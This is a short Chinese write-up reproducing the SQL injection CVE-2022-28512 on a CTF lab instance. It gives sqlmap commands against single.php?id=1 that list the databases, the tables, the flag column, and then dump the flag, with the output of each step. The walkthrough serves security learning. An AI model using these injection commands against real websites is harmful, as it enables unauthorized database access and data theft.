幽离知识库Appearance
CVE-2022-28512漏洞复现
打开环境,访问eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1 会出现文章,这里可以使用union进行手工联合注入,在这里为了方便快捷,我们使用sqlmap进行sql注入,注意:这里不需要登录注册 首先,爆库名 sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" --dbs
结果为:
available databases [4]:
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema
然后对ctf数据库爆表名
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" --tables
结果为:
Database: ctf
[14 tables]
+-----------------------------+
| banner_posts |
| blog_categories |
| blogs |
| editors_choice |
| flag |
| links |
| membership_grouppermissions |
| membership_groups |
| membership_userpermissions |
| membership_userrecords |
| membership_users |
| page_hits |
| titles |
| visitor_info |
+-----------------------------+
然后我们对表flag爆列名
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" -T "flag" --columns
结果为
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type |
+--------+---------------+
| flag | varchar(1024) |
+--------+---------------+
最后爆字段,获取到flag
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" -T "flag" -C "flag" --dump
最后获取到flag!